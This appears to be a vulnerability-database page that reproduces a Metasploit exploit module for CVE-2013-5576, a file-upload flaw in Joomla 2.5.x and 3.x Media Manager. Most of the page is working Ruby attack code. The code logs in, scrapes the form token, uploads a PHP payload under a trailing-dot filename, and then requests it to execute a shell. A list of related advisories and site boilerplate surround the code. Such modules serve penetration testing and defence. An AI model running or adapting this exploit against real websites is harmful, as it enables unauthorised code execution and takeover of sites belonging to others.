Lucene search
+L

Joomla Media Manager File Upload Vulnerability

🗓️ 13 Aug 2013 21:27:27Reported by Jens Hinrichsen, juan vazquez <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 44 Views

Joomla Media Manager File Upload Vulnerability. Allows arbitrary file uploads and results in arbitrary code execution. Requires valid username and password for Media Manager access

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2013-5576
9 Oct 201314:54
attackerkb
Circl
CVE-2013-5576
15 Aug 201300:00
circl
Check Point Advisories
Joomla Media Manager File Upload Code Execution (CVE-2013-5576)
23 Jun 201400:00
checkpoint_advisories
CVE
CVE-2013-5576
9 Oct 201314:44
cve
Cvelist
CVE-2013-5576
9 Oct 201314:44
cvelist
Dsquare
Joomla 2.5.13 & 3.1.4 File Upload
21 Aug 201300:00
dsquare
Dsquare
Joomla 1.5.26 File Upload
21 Aug 201300:00
dsquare
Tenable Nessus
Joomla! 2.5.x < 2.5.14 / 3.x < 3.1.5 .php. File Upload RCE
8 Aug 201300:00
nessus
canvas
Immunity Canvas: JOOMLA_MM_RCE
9 Oct 201314:54
canvas
NVD
CVE-2013-5576
9 Oct 201314:54
nvd
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Joomla Media Manager File Upload Vulnerability",
      'Description'    => %q{
        This module exploits a vulnerability found in Joomla 2.5.x up to 2.5.13, as well as
        3.x up to 3.1.4 versions. The vulnerability exists in the Media Manager component,
        which comes by default in Joomla, allowing arbitrary file uploads, and results in
        arbitrary code execution. The module has been tested successfully on Joomla 2.5.13
        and 3.1.4 on Ubuntu 10.04. Note: If public access isn't allowed to the Media
        Manager, you will need to supply a valid username and password (Editor role or
        higher) in order to work properly.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Jens Hinrichsen', # Vulnerability discovery according to the OSVDB
          'juan vazquez' # Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2013-5576' ],
          [ 'OSVDB', '95933' ],
          [ 'URL', 'http://developer.joomla.org/security/news/563-20130801-core-unauthorised-uploads' ],
          [ 'URL', 'http://www.cso.com.au/article/523528/joomla_patches_file_manager_vulnerability_responsible_hijacked_websites/' ],
          [ 'URL', 'https://github.com/joomla/joomla-cms/commit/fa5645208eefd70f521cd2e4d53d5378622133d8' ],
          [ 'URL', 'http://niiconsulting.com/checkmate/2013/08/critical-joomla-file-upload-vulnerability/' ],
          [ 'URL', 'https://www.rapid7.com/blog/post/2013/08/15/time-to-patch-joomla' ]
        ],
      'Payload'        =>
        {
          'DisableNops' => true,
          # Arbitrary big number. The payload gets sent as POST data, so
          # really it's unlimited
          'Space'       => 262144, # 256k
        },
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Joomla 2.5.x <=2.5.13 / Joomla 3.x <=3.1.4', {} ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2013-08-01',
      'DefaultTarget'  => 0))

      register_options(
        [
          OptString.new('TARGETURI', [true, 'The base path to Joomla', '/joomla']),
          OptString.new('USERNAME', [true, 'User to login with', '']),
          OptString.new('PASSWORD', [true, 'Password to login with', '']),
        ])

  end

  def check
    res = get_upload_form

    if res and (res.code == 200 or res.code == 302)
      if res.body =~ /You are not authorised to view this resource/
        vprint_status("Joomla Media Manager Found but authentication required")
        return Exploit::CheckCode::Detected
      elsif res.body =~ /<form action="(.*)" id="uploadForm"/
        vprint_status("Joomla Media Manager Found and authentication isn't required")
        return Exploit::CheckCode::Detected
      end
    end

    return Exploit::CheckCode::Safe
  end

  def upload(upload_uri)
    begin
      u = URI(upload_uri)
    rescue ::URI::InvalidURIError
      fail_with(Failure::Unknown, "Unable to get the upload_uri correctly")
    end

    data = Rex::MIME::Message.new
    data.add_part(payload.encoded, "application/x-php", nil, "form-data; name=\"Filedata[]\"; filename=\"#{@upload_name}.\"")
    post_data = data.to_s

    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => "#{u.path}?#{u.query}",
      'ctype'    => "multipart/form-data; boundary=#{data.bound}",
      'cookie'   => @cookies,
      'vars_get' => {
        'asset'  => 'com_content',
        'author' => '',
        'format' => '',
        'view'   => 'images',
        'folder' => ''
      },
      'data'     => post_data
    })

    return res

  end

  def get_upload_form
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, "index.php"),
      'cookie'   => @cookies,
      'encode_params' => false,
      'vars_get' => {
        'option' => 'com_media',
        'view'   => 'images',
        'e_name' => 'jform_articletext',
        'asset'  =>  'com_content',
        'author' => ''
      }
    })

    return res
  end

  def get_login_form

    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, "index.php", "component", "users", "/"),
      'cookie'   => @cookies,
      'vars_get' => {
        'view' => 'login'
      }
    })

    return res

  end

  def login
    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(target_uri.path, "index.php", "component", "users", "/"),
      'cookie'   => @cookies,
      'vars_get' => {
        'task' => 'user.login'
      },
      'vars_post' => {
        'username' => @username,
        'password' => @password
        }.merge(@login_options)
      })

    return res
  end

  def parse_login_options(html)
    html.scan(/<input type="hidden" name="(.*)" value="(.*)" \/>/) {|option|
      @login_options[option[0]] = option[1] if option[1] == "1" # Searching for the Token Parameter, which always has value "1"
    }
  end

  def exploit
    @login_options = {}
    @cookies = ""
    @upload_name = "#{rand_text_alpha(rand(5) + 3)}.php"
    @username = datastore['USERNAME']
    @password = datastore['PASSWORD']

    print_status("Checking Access to Media Component...")
    res = get_upload_form

    if res and (res.code == 200 or res.code == 302) and !res.get_cookies.empty? and res.body =~ /You are not authorised to view this resource/
      print_status("Authentication required... Proceeding...")

      if @username.empty? or @password.empty?
        fail_with(Failure::BadConfig, "#{peer} - Authentication is required to access the Media Manager Component, please provide credentials")
      end
      @cookies = res.get_cookies.sub(/;$/, "")

      print_status("Accessing the Login Form...")
      res = get_login_form
      if res.nil? or (res.code != 200 and res.code != 302) or res.body !~ /login/
        fail_with(Failure::Unknown, "#{peer} - Unable to Access the Login Form")
      end
      parse_login_options(res.body)

      res = login
      if not res or res.code != 303
        fail_with(Failure::NoAccess, "#{peer} - Unable to Authenticate")
      end
    elsif res and (res.code == 200 or res.code == 302) and !res.get_cookies.empty? and res.body =~ /<form action="(.*)" id="uploadForm"/
      print_status("Authentication isn't required.... Proceeding...")
      @cookies = res.get_cookies.sub(/;$/, "")
    else
      fail_with(Failure::UnexpectedReply, "#{peer} - Failed to Access the Media Manager Component")
    end

    print_status("Accessing the Upload Form...")
    res = get_upload_form

    if res and (res.code == 200 or res.code == 302) and res.body =~ /<form action="(.*)" id="uploadForm"/
      upload_uri = Rex::Text.html_decode($1)
    else
      fail_with(Failure::Unknown, "#{peer} - Unable to Access the Upload Form")
    end

    print_status("Uploading shell...")

    res = upload(upload_uri)

    if res.nil? or res.code != 200
      fail_with(Failure::Unknown, "#{peer} - Upload failed")
    end

    register_files_for_cleanup("#{@upload_name}.")
    print_status("Executing shell...")
    send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, "images", @upload_name),
    })

  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 Feb 2022 23:22Current
10High risk
Vulners AI Score10
CVSS 26.8
EPSS0.48191
44